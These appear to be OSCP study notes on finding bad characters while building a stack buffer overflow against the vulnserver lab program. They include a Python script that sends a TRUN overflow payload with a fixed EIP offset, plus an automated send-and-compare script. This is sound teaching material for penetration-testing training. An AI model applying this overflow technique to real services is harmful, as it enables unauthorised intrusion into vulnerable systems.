OSCP Learning Notes - Buffer Overflows(3)

Finding Bad Characters

1. Get the list of bad characters from the following website (the standard list of every byte value \x01 to \xff, with \x00 already left out because it terminates the string):


2. Write a Python test script that places the badchars right after the EIP overwrite, so they land where ESP points after the crash.

import socket
import sys

# Every byte value except \x00 (the \x01..\xff list from the website,
# generated here instead of written out). \x00 terminates the string in
# vulnserver and would cut the buffer short, so it is never tested.
badchars = bytes(range(0x01, 0x100))

# 2003 bytes reach EIP, 4 bytes overwrite it, then the badchars sit at ESP.
shellcode = b"A" * 2003 + b"B" * 4 + badchars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect(('10.0.0.XX', 9999))
    s.send(b'TRUN /.:/' + shellcode)
    print("check debugger")
except socket.error:
    print("cannot connect to the target")
    sys.exit(1)
finally:
    s.close()


3. Start vulnserver on the Windows machine and attach Immunity Debugger to it, so the debugger catches the crash.

4. Run the script. vulnserver crashes with EIP overwritten by the B's (42424242) and the debugger pauses on the access violation.

5. In the Registers pane, right click on the ESP value and select Follow in Dump.

6. Compare the hex bytes in the dump with the badchars string, starting from 01 02 03 04. The first byte that is missing, changed, or after which the sequence stops (or turns into garbage) is a bad character. Only that first divergence counts, because everything after a mangled byte shifts or disappears. Remove it from badchars, rerun the script, and repeat until the dump matches the sent string byte for byte; the bytes removed along the way (plus \x00) are the bad characters to exclude when generating the shellcode.
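The send, dump, compare and repeat loop behind steps 2 to 6, written out as an added example that is not part of these notes. It assumes the layout of a line copied out of Immunity's dump window (8-digit address, up to 16 hex bytes, then the ASCII column), the 2003-byte offset and "B" * 4 EIP overwrite from the notes, and a hypothetical placeholder host for the real send. SAMPLE_DUMP is constructed by hand with 0x0a missing, and fake_vulnserver is a made-up stand-in that drops 0x0d and truncates at 0x00, so the loop can be run offline; the real bad characters always come from the debugger.

```python
import re
import socket

# From the earlier crash analysis in these notes: 2003 bytes reach EIP, the
# next 4 bytes overwrite it, and whatever follows is what ESP points at.
OFFSET_TO_EIP = 2003
EIP_FILLER = b"B" * 4


def build_badchars(exclude=(0x00,)):
    """Every byte value 0x00-0xff except those already known to be bad.
    \\x00 is excluded from the start: it terminates the string inside the
    target, so nothing after it would reach the stack at all."""
    return bytes(b for b in range(256) if b not in exclude)


def send_badchars(host, port, badchars, timeout=5):
    """Send one TRUN test payload, the same shape as the notes' script.
    Needs a live vulnserver with Immunity attached (host is a placeholder);
    the offline test below never calls it."""
    payload = b"TRUN /.:/" + b"A" * OFFSET_TO_EIP + EIP_FILLER + badchars
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)


# Assumed layout of a row copied from Immunity's dump window: an 8-digit
# address, up to 16 hex bytes, then the ASCII column (which is ignored).
DUMP_LINE = re.compile(
    r"^\s*[0-9A-Fa-f]{8}\s+((?:[0-9A-Fa-f]{2}(?:\s+|$)){1,16})")


def parse_dump(text):
    """Turn pasted dump rows back into the raw bytes that were at ESP."""
    out = bytearray()
    for line in text.splitlines():
        m = DUMP_LINE.match(line)
        if m:
            out += bytes.fromhex("".join(m.group(1).split()))
    return bytes(out)


def first_bad_char(sent, dumped):
    """Walk the sent string against the dump and return the first byte that
    is missing or altered, or None if the dump matches byte for byte.

    Only the first divergence is trusted: once one byte is dropped or
    changed, everything behind it shifts or disappears, so later mismatches
    are noise. A dump shorter than the sent string is treated as truncation,
    so copy all rows of the badchars region, not just the first few."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def find_all_bad_chars(run_once, initial=(0x00,)):
    """Repeat send -> dump -> compare, removing one bad byte per round, until
    the dump matches. run_once(badchars) must return the bytes seen at ESP."""
    exclude = set(initial)
    while True:
        sent = build_badchars(exclude)
        bad = first_bad_char(sent, run_once(sent))
        if bad is None:
            return sorted(exclude)
        exclude.add(bad)


# Constructed sample: two rows as they might be pasted from "Follow in Dump".
# The 0x0a byte is missing on purpose, to show what a dropped byte looks like.
SAMPLE_DUMP = """\
0186F9A8  01 02 03 04 05 06 07 08 09 0B 0C 0D 0E 0F 10 11  ................
0186F9B8  12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21  .............. !
"""


def fake_vulnserver(badchars):
    """Constructed stand-in for the real target so the loop runs offline.
    It is assumed, for illustration only, to drop 0x0d and to truncate at
    0x00; the real bad characters must come from the debugger."""
    seen = badchars.replace(b"\x0d", b"")
    return seen.split(b"\x00", 1)[0]


if __name__ == "__main__":
    print("first bad byte in the sample dump: 0x%02x"
          % first_bad_char(build_badchars(), parse_dump(SAMPLE_DUMP)))
    print("bad chars found against the fake target:",
          [hex(b) for b in find_all_bad_chars(fake_vulnserver)])
```

Against a real target, replace fake_vulnserver with a function that calls send_badchars, waits for the crash, and returns parse_dump() of the rows pasted from the debugger; one round per removed byte is the price of only trusting the first divergence.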


